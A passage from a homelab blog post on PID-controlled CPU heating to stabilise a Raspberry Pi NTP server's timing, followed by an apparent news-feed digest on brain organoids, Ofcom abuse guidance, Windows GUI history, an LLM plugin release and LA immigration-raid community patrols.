        # Integral with anti-windup
        self._integral += error * dt
        I = self.Ki * self._integral

        # Derivative
        derivative = (error - self._last_error) / dt if dt > 0 else 0.0
        D = self.Kd * derivative

        # Combine and clamp
        output = P + I + D
        low, high = self.output_limits
        output = max(low, min(high, output))

        self._last_output = output
        self._last_error = error
        self._last_time = now

        return output

def read_cpu_temperature(path='/sys/class/thermal/thermal_zone0/temp'):
    """Return CPU temperature in Celsius."""
    with open(path, 'r') as f:
        temp_str = f.read().strip()
    return float(temp_str) / 1000.0

def burn_cpu(duration):
    """Busy-loop hashing for 'duration' seconds."""
    end_time = time.time() + duration
    m = hashlib.md5()
    while time.time() < end_time:
        m.update(b"burning-cpu")

def worker_loop(worker_id, cmd_queue, done_queue):
    """
    Worker process:
    - Pins itself to CPUs 1, 2, or 3 (avoiding CPU 0)
    - Burns CPU based on commands from main process
    """
    available_cpus = [1, 2, 3]
    cpu_to_use = available_cpus[worker_id % len(available_cpus)]
    os.sched_setaffinity(0, {cpu_to_use})
    print(f"Worker {worker_id} pinned to CPU {cpu_to_use}")

    while True:
        cmd = cmd_queue.get()
        if cmd is None:
            break

        burn_time, sleep_time = cmd
        burn_cpu(burn_time)
        time.sleep(sleep_time)
        done_queue.put(worker_id)

# Main control loop (simplified)
def main():
    target_temp = 54.0  # degrees Celsius
    control_window = 0.20  # 200ms cycle time

    pid = PIDController(Kp=0.05, Ki=0.02, Kd=0.0,
                        setpoint=target_temp,
                        sample_time=0.18)

    # Start 3 worker processes
    workers = []
    cmd_queues = []
    done_queue = multiprocessing.Queue()

    for i in range(3):
        q = multiprocessing.Queue()
        p = multiprocessing.Process(target=worker_loop, args=(i, q, done_queue))
        p.start()
        workers.append(p)
        cmd_queues.append(q)

    try:
        while True:
            # Measure temperature
            current_temp = read_cpu_temperature()

            # PID control: output is fraction of time to burn (0.0 to 1.0)
            output = pid.update(current_temp)

            # Convert to burn/sleep times
            burn_time = output * control_window
            sleep_time = control_window - burn_time

            # Send command to all workers
            for q in cmd_queues:
                q.put((burn_time, sleep_time))

            # Wait for workers to complete
            for _ in range(3):
                done_queue.get()

            print(f"Temp={current_temp:.2f}C, Output={output:.2f}, "
                  f"Burn={burn_time:.2f}s")

    except KeyboardInterrupt:
        for q in cmd_queues:
            q.put(None)
        for p in workers:
            p.join()

if __name__ == '__main__':
    main()

The full implementation includes a temperature filtering system to smooth out sensor noise and command-line arguments for tuning the PID parameters.

PID Tuning Notes:

  • Kp=0.05 : Proportional gain – responds to current error
  • Ki=0.02 : Integral gain – eliminates steady-state error
  • Kd=0.0 : Derivative gain – set to zero because temperature changes slowly

The target temperature of 54°C was chosen empirically – high enough to keep the CPU from idling down, but low enough to avoid thermal throttling (which starts around 80°C on Raspberry Pi).

The Results: Numbers Don’t Lie

The improvement was immediately visible. Here are the statistics comparing performance before and after the optimization:

A note on ambient conditions: The Raspberry Pi lives in a project enclosure in our master bedroom (chosen for its decent GPS reception and ADS-B coverage for a new aircraft AR overlay app idea I’m working on also running on this Pi). While the time burner maintains the CPU die temperature at 54°C, the enclosure is still subject to ambient temperature swings. Room temperature cycles from a low of 66°F (18.9°C) at 5:15 AM to a peak of 72°F (22.2°C) at 11:30 AM – a 6°F daily swing from our heating schedule. The fact that we see such dramatic frequency stability improvements despite this ambient variation speaks to how effective the thermal control is. The CPU’s active heating overwhelms the environmental changes, maintaining consistent silicon temperature where it matters most.

Frequency Stability

Frequency Variability
Metric Before After Improvement
Mean RMS Offset 85.44 ns 43.54 ns 49.0% reduction
Median RMS Offset 80.13 ns 37.93 ns 52.7% reduction

The RMS offset is chronyd’s estimate of the timing uncertainty. Cutting this nearly in half means the system is maintaining significantly better time accuracy.

Setup Instructions

Want to replicate this? Here’s the step-by-step process:

Prerequisites

You need a working GPS PPS NTP server setup. If you don’t have one yet, follow my 2025 NTP guide first.

Step 0: Install Required Tools

sudo apt-get update
sudo apt-get install linux-cpupower python3 util-linux

Step 1: Create the Boot Optimization Script

Save the optimization script from earlier as /usr/local/bin/pps-optimize.sh :

sudo nano /usr/local/bin/pps-optimize.sh
# Paste the script content
sudo chmod +x /usr/local/bin/pps-optimize.sh

Step 2: Create Systemd Service for Boot Script

Create /etc/systemd/system/pps-optimize.service :

[Unit]
Description=PPS NTP Performance Optimization
After=chronyd.service
Requires=chronyd.service

[Service]
Type=oneshot
ExecStart=/usr/local/bin/pps-optimize.sh
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target

Enable it:

sudo systemctl enable pps-optimize.service

Step 3: Install the Time Burner Script

Save the time burner Python script as /usr/local/bin/time_burner.py :

sudo nano /usr/local/bin/time_burner.py
# Paste the full time burner script
sudo chmod +x /usr/local/bin/time_burner.py

Step 4: Create Systemd Service for Time Burner

Create /etc/systemd/system/time-burner.service :

[Unit]
Description=CPU Thermal Stabilization for NTP
After=network.target

[Service]
Type=simple
User=root
ExecStart=/usr/bin/python3 /usr/local/bin/time_burner.py -t 54.0 -n 3
Restart=always
RestartSec=10

[Install]
WantedBy=multi-user.target

Enable and start it:

sudo systemctl enable time-burner.service
sudo systemctl start time-burner.service

Step 5: Verify the Setup

Check that everything is running:

# Verify CPU governor
cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor
# Should output: performance

# Check chronyd CPU affinity and priority
ps -eo pid,comm,psr,ni,rtprio | grep chronyd
# Should show psr=0 (CPU 0) and rtprio=50

# Check time burner processes
ps aux | grep time_burner
# Should show 4 processes (1 main + 3 workers)

# Monitor NTP performance
chronyc tracking

Example output from chronyc tracking :

Reference ID    : 50505300 (PPS)
Stratum         : 1
Ref time (UTC)  : Sun Nov 24 16:45:23 2025
System time     : 0.000000038 seconds fast of NTP time
Last offset     : -0.000000012 seconds
RMS offset      : 0.000000035 seconds
Frequency       : 1.685 ppm slow
Residual freq   : -0.001 ppm
Skew            : 0.002 ppm
Root delay      : 0.000000001 seconds
Root dispersion : 0.000010521 seconds
Update interval : 16.0 seconds
Leap status     : Normal

Notice the RMS offset of 35 nanoseconds – this is the kind of accuracy you can achieve with thermal stabilization.

Step 6: Monitor Over Time

(Topic for a future post)

Set up Grafana dashboards to monitor:

  • Frequency offset (PPM)
  • RMS offset (nanoseconds)
  • CPU temperature
  • System time offset

You’ll see the frequency stabilize within a few hours as the PID controller locks onto the target temperature.

Monitoring and Troubleshooting

Real-Time Monitoring

Watch chronyd tracking in real-time:

watch -n 1 "chronyc tracking"

Check time burner status:

sudo systemctl status time-burner.service

View time burner output:

sudo journalctl -u time-burner.service -f

Common Issues

Temperature overshoots or oscillates:

  • Adjust PID gains – reduce Kp if oscillating, increase Ki if steady-state error
  • Try different target temperatures (50-60°C range)

High CPU usage (obviously):

  • This is intentional – the time burner uses ~90% of 3 cores
  • Not suitable for Pis running other workloads

Chronyd not pinned to CPU 0:

  • Check that the optimization script runs after chronyd starts
  • Adjust the timing in the systemd service dependencies

Trade-offs and Considerations

Let’s be honest about the downsides:

Power Consumption

The time burner keeps 3 cores at ~30% average utilization. My Pi now draws about 3-4W continuously (vs 1-2W idle). Over a year, that’s an extra 15-25 kWh, or about $2-3 in electricity (depending on your rates).

Heat

Running at 54°C means the Pi is warm to the touch. This is well within safe operating temperature (thermal throttling doesn’t start until 80°C), but you might want to ensure adequate ventilation. I added a small heatsink just to be safe.

CPU Resources

You’re dedicating 3 of 4 cores to burning cycles. This is fine for a dedicated NTP server, but not suitable if you’re running other services on the same Pi. That said, I am also running the feeder to my new ADS-B aircraft visualization app on it. My readsb instance regularly gets to 1200 msg/s with 200+ aircraft.

Is It Worth It?

For 99.999% of use cases: absolutely not .

Most applications don’t need better than millisecond accuracy, let alone the 35-nanosecond RMS offset I’m achieving. Even for distributed systems, microsecond-level accuracy is typically overkill.

When this might make sense:

  • Precision timing applications (scientific instrumentation, radio astronomy)
  • Distributed systems research requiring tight clock synchronization
  • Network testing where timing precision affects results
  • Because you can (the best reason for any homelab project)

For me, this falls squarely in the “because you can” category. I had the monitoring infrastructure in place, noticed the thermal correlation, and couldn’t resist solving the problem. Plus, I learned a lot about PID control, CPU thermal characteristics, and Linux real-time scheduling.

Future Improvements

Some ideas I’m considering:

Adaptive PID Tuning

The current PID gains are hand-tuned for a specific ambient temperature range. The fairly low P value is to avoid spikes when some load on the Pi kicks up the temp. The I is a balance to keep long term “burn” relatively consistent. Implementing an auto-tuning algorithm (like Ziegler-Nichols) or adaptive PID could handle seasonal temperature variations better.

Hardware Thermal Control

Instead of software thermal control, I could add an actively cooled heatsink with PWM fan control. This might achieve similar temperature stability while using less power overall.

Oven-Controlled Crystal Oscillator (OCXO)

For the ultimate in frequency stability, replacing the Pi’s crystal with a temperature-controlled OCXO would eliminate thermal drift at the source. This is how professional timing equipment works. I do have a BH3SAP GPSDO sitting next to me (subject to a future post)… Then again, I’m the person who just wrote 4000 words about optimizing a $50 time server, so who am I kidding?

Conclusions

Through a combination of CPU core isolation and PID-controlled thermal stabilization, I achieved:

  • 81% reduction in frequency variability
  • 77% reduction in frequency standard deviation
  • 74% reduction in frequency range
  • 49% reduction in RMS offset

The system now maintains 38-nanosecond median RMS offset from the GPS PPS reference, with frequency drift that’s barely detectable in the noise. The CPU runs at a constant 54°C, and in steady state, the frequency offset stays within a tight ±0.14 PPM band (compared to ±0.52 PPM before optimization).

Was this necessary? No. Did I learn a bunch about thermal management, PID control, and Linux real-time scheduling? Yes. Would I do it again? Absolutely.

Resource

I did come across a “burn” script that was the basis for this thermal management. I can’t find it at the moment, but when I do I’ll link it here.

Related Posts

Further Reading

Have questions or suggestions? Drop a comment below. I’m particularly interested to hear if anyone has tried alternative thermal management approaches or has experience with OCXO modules for Raspberry Pi timing applications.

Thanks for reading, and happy timekeeping!

Post Views: 640

Human brains are preconfigured with instructions for understanding the world

Hacker News
news.ucsc.edu
2025-11-25 06:31:31
Comments...
Original Article

Press Contact

Key takeaways

  • New findings suggest the brain has preconfigured, structured activity patterns even before sensory experiences occur.
  • UC Santa Cruz researchers used brain organoids to study the brain’s earliest electrical activity.
  • Understanding early brain patterns could have important implications for diagnosing and treating developmental brain disorders.

Humans have long wondered when and how we begin to form thoughts. Are we born with a pre-configured brain, or do thought patterns only begin to emerge in response to our sensory experiences of the world around us? Now, science is getting closer to answering the questions philosophers have pondered for centuries.

Researchers at the University of California, Santa Cruz, are using tiny models of human brain tissue, called organoids, to study the earliest moments of electrical activity in the brain. A new study in Nature Neuroscience finds that the earliest firings of the brain occur in structured patterns without any external experiences, suggesting that the human brain is preconfigured with instructions about how to navigate and interact with the world.

“These cells are clearly interacting with each other and forming circuits that self-assemble before we can experience anything from the outside world,” said Tal Sharf, assistant professor of biomolecular engineering at the Baskin School of Engineering and the study’s senior author. “There’s an operating system that exists, that emerges in a primordial state. In my laboratory, we grow brain organoids to peer into this primordial version of the brain’s operating system and study how the brain builds itself before it’s shaped by sensory experience.”

In improving our fundamental understanding of human brain development, these findings can help researchers better understand neurodevelopmental disorders, and pinpoint the impact of toxins like pesticides and microplastics in the developing brain.

Sharf holds a CMOS-based microelectrode array chip. These devices contain thousands of miniaturized amplifiers used to triangulate the electrical activity of single neurons within millimeter-sized organoid tissue.

Studying the developing brain

The brain, similar to a computer, runs on electrical signals—the firing of neurons. When these signals begin to fire, and how the human brain develops, are challenging topics for scientists to study, as the early developing human brain is protected within the womb.

Organoids, which are 3D models of tissue grown from human stem cells in the lab, provide a unique window into brain development. The Braingeneers group at UC Santa Cruz, in collaboration with researchers at UC San Francisco and UC Santa Barbara, are pioneering methods to grow these models and take measurements from them to gain insights into brain development and disorders.

Organoids are particularly useful for understanding if the brain develops in response to sensory input—as they exist in the lab setting and not the body—and can be grown ethically in large quantities. In this study, researchers prompted stem cells to form brain tissue, and then measured their electrical activity using specialized microchips, similar to those that run a computer. Sharf’s background in both applied physics, computation, and neurobiology form his expertise in modelling the circuitry of the early brain.

“An organoid system that’s intrinsically decoupled from any sensory input or communication with organs gives you a window into what’s happening with this self-assembly process,” Sharf said. “That self-assembly process is really hard to do with traditional 2D cell culture—you can’t get the cell diversity and the architecture. The cells need to be in intimate contact with each other. We’re trying to control the initial conditions, so we can let biology do its wonderful thing.”

The Sharf lab is developing novel neural interfaces, leveraging expertise in physics, materials science, and electrical engineering. On the right, Koushik Devarajan, an electrical and computer engineering Ph.D. student in the Sharf lab.

Pattern production

The researchers observed the electrical activity of the brain tissue as they self-assembled from stem cells into a tissue that can translate the senses and produce language and conscious thought. They found that within the first few months of development, long before the human brain is capable of receiving and processing complex external sensory information such as vision and hearing, its cells spontaneously began to emit electrical signals characteristic of the patterns that underlie translation of the senses.

Through decades of neuroscience research, the community has discovered that neurons fire in patterns that aren’t just random. Instead, the brain has a “default mode” — a basic underlying structure for firing neurons which then becomes more specific as the brain processes unique signals like a smell or taste. This background mode outlines the possible range of sensory responses the body and brain can produce.

In their observations of single neuron spikes in the self-assembling organoid models, Sharf and colleagues found that these earliest observable patterns have striking similarity with the brain’s default mode. Even without having received any sensory input, they are firing off a complex repertoire of time-based patterns, or sequences, which have the potential to be refined for specific senses, hinting at a genetically encoded blueprint inherent to the neural architecture of the living brain.

“These intrinsically self-organized systems could serve as a basis for constructing a representation of the world around us,” Sharf said. “The fact that we can see them in these early stages suggests that evolution has figured out a way that the central nervous system can construct a map that would allow us to navigate and interact with the world.”

Knowing that these organoids produce the basic structure of the living brain opens up a range of possibilities for better understanding human neurodevelopment, disease, and the effects of toxins in the brain.

“We’re showing that there is a basis for capturing complex dynamics that likely could be signatures of pathological onsets that we could study in human tissue,” Sharf said. “That would allow us to develop therapies, working with clinicians at the preclinical level to potentially develop compounds, drug therapies, and gene editing tools that could be cheaper, more efficient, higher throughput.”

This study included researchers at UC Santa Barbara, Washington University in St. Louis, Johns Hopkins University, the University Medical Center Hamburg-Eppendorf, and ETH Zurich.

A group of 15 researchers smile at the camera.
The Sharf lab.

Related Topics

Ofcom urges social media platforms to combat abuse and limit online ‘pile-ons’

Guardian
www.theguardian.com
2025-11-25 06:00:26
New guidance from UK regulator aims to combat misogynist abuse and ‘revenge porn’ Social media platforms are being urged to limit internet “pile-ons” under new guidelines to protect women and girls online. The guidance from Ofcom, the UK communications regulator, to combat misogynist abuse, coercive...
Original Article

Social media platforms are being urged to limit internet “pile-ons” under new guidelines to protect women and girls online.

The guidance from Ofcom , the UK communications regulator, to combat misogynist abuse, coercive control and the sharing of intimate images without consent comes into force on Tuesday and includes recommendations to prevent women being harried online.

The measures suggest tech companies enforce limits on the number of responses to posts on platforms such as X , in a move that Ofcom hopes will reduce pile-ons, where individual users are deluged with abusive replies to their posts.

Other measures raised by Ofcom include platforms using a database of images to protect women and girls from the sharing of intimate images without the subject’s consent – often referred to as “revenge porn”.

The watchdog is urging the use of “hash-matching” technology, which allows platforms to take down an image that has been the subject of a complaint. Under the system, an image or video reported by a user is cross-referenced against a database of illicit images – for instance, a “revenge porn” image or an explicit deepfake – that have been converted into “hashes”, or digital fingerprints. This allows harmful images to be detected and removed from circulation.

The recommendations have been made under the Online Safety Act (OSA), a landmark piece of legislation designed to protect children and adults from harmful material on the internet.

Although the recommendations are technically voluntary, Ofcom has put pressure on social media companies to comply, saying it will publish a report in 2027 on how individual platforms have responded to the guidelines.

The regulator added that the OSA could be toughened if the recommendations were ignored or implemented ineffectively.

“If their action falls short, we will consider making formal recommendations to government on where the Online Safety Act may need to be strengthened,” said Ofcom.

Dame Melanie Dawes, Ofcom’s chief executive, said she had encountered “shocking” stories of online abuse suffered by women and girls.

Melanie Daws smiles as he walks along a pavement in Westminster
Melanie Dawes, the chief executive of Ofcom. Photograph: Zuma Press Inc/Alamy

“We are sending a clear message to tech firms to step up and act in line with our practical industry guidance, to protect their female users against the very real online risks they face today,” said Dawes. “With the continued support of campaigners, advocacy groups and expert partners, we will hold companies to account and set a new standard for women’s and girls’ online safety in the UK.”

Other recommendations announced by Ofcom include: deploying prompts asking people to think twice before posting abusive content; imposing “time-outs” for people who repeatedly misuse a platform; preventing misogynistic users from earning a share of advertising revenue related to their posts; and allowing users to quickly block or mute multiple accounts at once.

The recommendations finalise a process launched in February when Ofcom issued a consultation that included the hash-matching measure. However, more than a dozen of the guidelines, including setting “rate limits” on posts, are entirely new.

Internet Matters, a nonprofit dedicated to children’s online safety, said the government should make the guidance mandatory and warned that many tech companies were likely to ignore it. Ofcom is consulting on whether to make the hash-matching recommendation mandatory.

Rachel Huggins, co-chief executive at Internet Matters, said: “We know that many companies will not adopt the guidance simply because it is not statutory, meaning the unacceptable levels of online harm which women and girls face today will remain high.”

Windows GUI – Good, Bad and Pretty Ugly (2023)

Hacker News
creolened.com
2025-11-25 05:33:44
Comments...
Original Article

Windows launched way back in 1985, when I was still using a Commodore 64 and PCs were all of four years old–barely out of diapers. The GUI or Graphical User Interface, has changed a lot over the years and I thought it might be fun/horrifying to rank every major version of the Windows GUI, from Windows 1.0 in 1985, to Windows 11 as of 2023.

I’m rating not based on how the system looked at the time (you can do only do so much with CGA/EGA graphics, after all), but how they look now. Is this fair? Probably not, but as always, I make the rules!

The rating system is based on a scale of 1 to 10 Clippys, with 10 being best.

NOTE: I am skipping over all versions of Windows NT because it follows the look of other versions mentioned below.

Overall Rankings:

  1. Windows 11
  2. Windows 2000
  3. Windows 95/98/Vista/7
  4. Windows 10
  5. Windows 3.0/3.1/XP
  6. Windows 8.1
  7. Windows 8
  8. Windows 2.0
  9. Windows 1.0

Windows 1.0 (1985)
Rating: 1 Clippy

In 1985, Windows ran on top of DOS, had drop-down menus, fixed windows, and CGA graphics. In a way, the extremely limited colour palette actually made it more colourful. Perhaps too colourful. This is pretty ugly all around. If you are a fan of this, you probably wear plaid bow ties unironically.

Windows 2.0 (1987)
Rating: 2.5 Clippys

This is where Windows goes from hideously ugly to just unattractive. The menu bars and arrows have been refined a little, and now you get resizable windows. It’s like a colour Macintosh, but hit with an ugly stick. And still needs to run on top of DOS.

Windows 3.0 (1990)
Rating: 6 Clippys

Microsoft makes a big leap with Windows 3, the first version to offer a coherent GUI, with pseudo 3D elements for buttons and scroll bars. Support for VGA graphics also means the cartoony look has gone away, making it look that more professional. It still needs DOS and has that weird File Manager/Program Manager split. Oh, and Minesweeper.

Windows 3.1 (1992)
Rating 6 Clippys

Windows hits the big time. This is the version where it was clear Windows was the future and DOS was the past. Windows 3.1 actually doesn’t look much different than 3.0, though, so it rates the same.

Windows 95 (1995)
Rating: 7.5 Clippys

With Windows 95, Microsoft managed to produce a version of its OS that scared Apple so much they ended up bringing Steve Jobs back, along with his own operating system, NeXTSTEP. Windows 95 introduced the taskbar, the Start button (it’s even labelled Start, how quaint!), a proper desktop and a continued refinement with the 3D bevelled look. The GUI is also simplified in some ways, with the title bar widgets all getting moved to the top-right corner. Icons are more detailed and colours are overall more subdued.

While it looks dated to our 2023 eyes, this GUI remains just as clear and functional today as it was 28 (!) years ago.

Windows 98 (1998)
Rating: 7.5 Clippys

Windows 98 basically looks the same as Windows 95, but Microsoft did add a stylin’ gradient effect to title bars. It’s not enough to change its rating over 95, though. Sorry, MS!

Note: I am skipping Windows Millennium Edition (Me) because while it had changes under the hood, visually it is pretty much Windows 98 Third Edition.

Windows 2000 (2000)
Rating: 8 Clippys

I admit bias here. First, this is essentially a version of Windows NT, which I said I wouldn’t be rating. Second, it really just brings the 95/98 look to the NT version of Windows. But this was the first version of Windows that tried to bridge the gap between consumer and business versions–and it mostly worked (if you could get it at a discount, like I did at the time). I give it a slight edge because they changed some of the icons, improving them, in my view. It also had a generally more sophisticated veneer–the last version of Windows to really use this approach for many years.

Windows XP (2001)
Rating: 6 Clippys

Our first regression! Windows XP gave us a pretty wallpaper (probably the most famous OS wallpaper ever) and there’s something I find pleasing about the look of its buttons and most of its icons. The bevelled look, combined with much brighter colours, though, gives the OS a decidedly less serious look. I’m not sure what Microsoft was going for, but I don’t think “cartoony” is what they had in mind. Not a total disaster or anything, but kind of goofy-looking in hindsight.

Windows Vista (2006)
Rating: 7.5 Clippys

With Vista, Microsoft sought to strip away the bright, simple colours of XP in favour of a glossy 3D sheen. For the most part, I think it works, though transparency does get a bit out of hand at times. I like how the Start button now looks more like a button. Icons are cleaner and more detailed. This is Microsoft saying Windows is all grown up now. Too bad about all the driver issues and steep system requirements.

Windows 7 (2009)
Rating: 7.5 Clippys

As you can see, Windows 7 is pretty much Vista, but with the transparency toned down. This is welcome, but it’s not enough to change its rating over Vista.

Windows 8 (2012)
Rating: 5 Clippys

And here we have a major step back. Microsoft somehow thought that in 2012 everyone would be using tablets with swipe gestures, and designed Windows 8’s GUI around this. They also elected to do away with finely-detailed icons in favour of simple, single-colour tiles and widgets. But the tiles could be one of many colours (and sizes), so you ended up with a crazy quilt look (see the screenshot below for a representative example). They got rid of the Start menu and the Start button. This is ugly. If you like Windows 8’s look, you are a bad person. You are the one Steve Jobs was talking about when he said Microsoft had no taste.

Windows 8.1 (2013)
Rating: 5.5 Clippys

Windows 8.1 made some changes, such as adding back the Start button and including the option to boot to the desktop, but the GUI was mostly the same, and just as ugly.

Windows 10 (2015)
Rating: 6.5 Clippys

Windows 10’s main mission was to undo Windows 8. It brought back the Start menu, it made the desktop the central part of the UI again, and it tamed some of the tile experience, though the flat look still persisted. This frankenOS approach means it feels like a cross between Windows 7 and 8. It’s not bad, but it’s also clearly the result of yanking the Windows GUI off in a new and unplanned direction.

Windows 11 (2021)
Rating: 8 Clippys

There are things to critique about Windows 11–its security requirements, the all but mandatory MS account, a push toward oversimplification of the Start menu. But in terms of GUI, this is probably the most refined the OS has been since 2000. It also restores a cohesion to the look of the OS that had been missing since Windows 7 in 2009. Sure, it’s clearly aping macOS in some ways, like the rounded corners on windows, but everything looks very clean. I actually would give this version the nod, aesthetically, over the current version of macOS (Monterey as I write this)–though not by a lot. The biggest knocks are its lack of customization (in some regards), removal of features (the taskbar can no longer be moved to other edges of the screen) and Microsoft’s annoying habit of adding more intrusive bloatware, pop-ups and other distractions. Looks-wise, though, it’s pretty nice!

Overall, the versions I feel Microsoft got right (and iterated on) were:

  • Windows 3.0
  • Windows 95
  • Windows Vista
  • Windows 11

The ones that struck out were:

  • Windows XP
  • Windows 8

The early versions (1.0 and 2.0) were hamstrung by the technology at the time, while Windows 10 had to pick up the pieces from Windows 8.

Rumours say Microsoft is working on Windows 12. If so, I wouldn’t expect it to depart visually from Windows 11, but you never know.

llm-anthropic 0.23

Simon Willison
simonwillison.net
2025-11-25 05:26:34
llm-anthropic 0.23 New plugin release adding support for Claude Opus 4.5, including the new thinking_effort option: llm install -U llm-anthropic llm -m claude-opus-4.5 -o thinking_effort low 'muse on pelicans' This took longer to release than I had hoped because it was blocked on Anthropic shipping...
Original Article

llm-anthropic 0.23 . New plugin release adding support for Claude Opus 4.5, including the new thinking_effort option:

llm install -U llm-anthropic
llm -m claude-opus-4.5 -o thinking_effort low 'muse on pelicans'

This took longer to release than I had hoped because it was blocked on Anthropic shipping 0.75.0 of their Python library with support for thinking effort.

Posted 25th November 2025 at 5:26 am

Jeff Dean on Important AI Trends

Lobsters
www.youtube.com
2025-11-25 05:25:56
Comments...

Immigration Raids at This Home Depot Got More Aggressive but Less Effective. The LA Tenants Union Knows Why.

Portside
portside.org
2025-11-25 04:09:25
Immigration Raids at This Home Depot Got More Aggressive but Less Effective. The LA Tenants Union Knows Why. Stephanie Mon, 11/24/2025 - 23:09 ...
Original Article

Arturo had only ever seen agents at the border before, never in Los Angeles. But on Friday, June 6, the Department of Homeland Security descended on a Home Depot near MacArthur Park. As on any other morning, Arturo had arrived at the store to wait alongside more than a hundred jornaleros for a day, or even a few hours, of construction work. He saw people running and heard screams of “la migra” before he laid eyes on the men in fatigues or understood that they were making arrests. He broke into a run, following a crowd through the store’s automatic doors. Agents were grabbing people seemingly at random “by their backpacks and without questioning them,” Arturo said. DHS seized 24 people at that Home Depot and 60 others in raids carried out throughout the city that day. He hasn’t seen two of his friends since.

Los Angeles has long been an urban laboratory for militarized repression — the Los Angeles Police Department invented SWAT teams and pioneered the use of police helicopters. But on June 6, the federal government made its opening gambit in what Trump called “the largest deportation operation in American history,” turning Los Angeles into a “test case,” in the words of Mayor Karen Bass, for its fascist incursion into American cities. In both small “snatch and grab” operations and large-scale raids that maximize spectacle as much as detentions, DHS dispatched armed, masked agents to that same MacArthur Park Home Depot multiple times over the summer — to kidnap workers, street vendors, and bystanders, without warrants or warning.

But since that first raid, agents haven’t entered the lot without encountering a DHS watch, staffed entirely by volunteers and organized by the LA Tenants Union. Like DHS, LATU spent the summer experimenting. Organizers built a long-term protective presence, developing relationships with those targeted and connecting people in detention with financial and legal support. They can’t stop the raids, but they have seen the direct impact of their work in shortened raid times and lower arrest rates. As the Trump administration expands its deportation project across the country, LATU’s efforts demonstrate the infrastructure and commitment needed to mount a response to an ever-changing, militarized, and lawless assault.

On the first day of DHS’s escalation, Los Angeles responded in open revolt. Dozens of people gathered outside Ambiance Apparel downtown as a raid was still underway, chased more agents to Chinatown, and then reconverged in front of the Metropolitan Detention Center and downtown U.S. Immigration and Customs Enforcement field office. The next day, militant crowds responded to ICE officers staging near a Home Depot in Paramount, on the southern edge of Los Angeles County, throwing cinder blocks at ICE vehicles and setting off fireworks toward police. That night, Trump deployed thousands of National Guard troops to the city, over the protests of Bass and Gov. Gavin Newsom. Trump promised to “liberate Los Angeles from the Migrant Invasion, and put an end to these Migrant riots.”

By Sunday, the downtown demonstrations swelled to thousands. Protestors took over the 101 freeway, set Waymos on fire, and chucked Lime scooters at police cars. The LAPD responded by firing tear gas and rubber bullets into the crowd at close range . Bass issued a curfew for the area. The days of mass actions led to more than 200 arrests and multiple injuries . One LA Tenants Union member was shot with “less than lethals” in each knee and a shin. He said the initial wave of protests to claim the streets would set the tone for the summer: fighting for “the right to stay so that you wouldn’t be kicked out.”

But as energy waned and police repression escalated, organizers faced a familiar challenge: trying to channel an uprising into sustained and coordinated action. Many Angelenos joined rapid-response networks to support roving ICE watches in their communities. But as Kevin, a LATU organizer, explained, early ICE watches often devolved into games of “cat and mouse.” (Last names have been omitted in this article to protect its sources.) Alerts — sometimes false — would go out in massive group chats, sending people racing to the scene, but often too late to intervene or even document an arrest.

Instead, LATU organizers attempted to root themselves in a specific place and community. Founded in 2015 (I helped start the organization), LATU is run by volunteers and sustained largely by members’ monthly dues; it has grown to almost 3,000 members with 14 local chapters. The same demographics that inspire the Trump administration to call Southern California “ground zero for the effects of the border crisis” make immigrants the majority of LATU’s base. According to the latest data, nearly 1 million undocumented people now live in Los Angeles County, a full third of residents are immigrants, and more than half speak a language other than English at home. Arturo joined LATU the previous April because of deteriorating conditions at his building, a boardinghouse with multiple people sharing a bedroom and sometimes even a bed, where he rents “a closet” for $380 a month. But he never expected to rely on the tenant union at work.

To respond to DHS’s attack on their community, LATU organizers relied on existing capacities to develop relationships of trust and borrowed strategies from years of organizing against displacement in tenants’ homes and neighborhoods. “How do you orient yourself in one very particular place that is under attack,” Kevin asked, “where it’s less about a commitment to some abstract immigrant, but actual people who you can hopefully build relationships with?”

Organizers turned to the site of the very first raid in their neighborhood, the MacArthur Park Home Depot. They studied the rhythms of the space, with its two entrances along Wilshire and on Union Avenue. They slowly introduced themselves to the workers, some leaning on the green gate that wraps around the block, ready to greet vehicles, others sitting around folding tables at the Central American Resource Center (CARECEN) Day Labor Center, a simple shed with a corrugated metal roof that adjoins the Home Depot lot. They met the street vendors who start setting up before sunrise, lining that corner down Shatto to sell pupusas, fresh orange juice, and eggs.

Just one week after the first raid, on June 13, LATU’s Koreatown local launched the organization’s first Centro de Defensa Communitaria — “Community Defense Center” in English, and “Centro” for short. Butterflies adorned a “migration is sacred” banner that hung from one orange pop-up tent. On another, an Old English tattoo font spelled out “Chinga la Migra.” Volunteers used oranges as paperweights to keep know-your-rights flyers from blowing away. They handed out donated food and water and maintained a watch from 7 a.m. to 12 p.m., so that day laborers and vendors had a measure of safety in seeking a day’s work. In the first weeks, the Centro boasted 20 to 30 volunteers a day. Some would arrive and work at remote jobs via mobile hot spots, ready to participate in an instant protest if agents returned.

Over time, a routine was established, with a few people manning the tables and a few on patrols. Most critical were those stationed at each entrance, practicing the “ever-changing art,” as LATU organizer Zoie put it, of identifying ICE and Customs and Border Patrol vehicles. Volunteers looked for obvious tells — Sprinter vans, new American cars, tinted windows, paper license plates, plate numbers that don’t appear in public databases — and tracked their movements over walkie-talkies. Relying on information shared across a regional coalition, they matched plates with those seen at previous raids or emerging from DHS staging grounds on Terminal Island. Recently, DHS developed more elaborate disguises for their vehicles; one Ford SUV sported a “Coexist” decal on its trunk.

According to White House Deputy Chief of Staff Stephen Miller, DHS has set a goal of 1 million deportations this year. In June, Congress gave the department the resources to realize such results — $170 billion in funding that will turn ICE into the 16th-largest military force in the world and double its detention-bed capacity to more than 100,000 people. In May, Miller ordered ICE’s 50 top field leads not to bother targeting undocumented people with criminal records. “Just go out there and arrest illegal aliens,” he said. He specifically urged them to target Home Depots.

The pattern of raids in Los Angeles shows DHS heeded his directive. An independent study of 200 raids carried out in Los Angeles County between June 6 and August 14 revealed that three-quarters of arrests were made at workplaces and half at home improvement stores. Its authors call Home Depot parking lots “one of the most dangerous spaces for immigrant workers in Los Angeles.” But the threat of hunger and homelessness have forced many to return. Rent was due, Arturo told me; despite his fears, he had to go back.

From his post on Union Street, Kevin described the MacArthur Park Home Depot where Arturo often works as a “snapshot” of the U.S. economy, revealing “descending levels of vulnerability and expulsion from regular work and regular recognition.” In the parking lot, day laborers wait for work —“day kidnapping,” in the words of one organizer — and street vendors wait to serve them. Across the way, other men gather to play music from a boombox and drink — a surplus of the pushed out and given up.

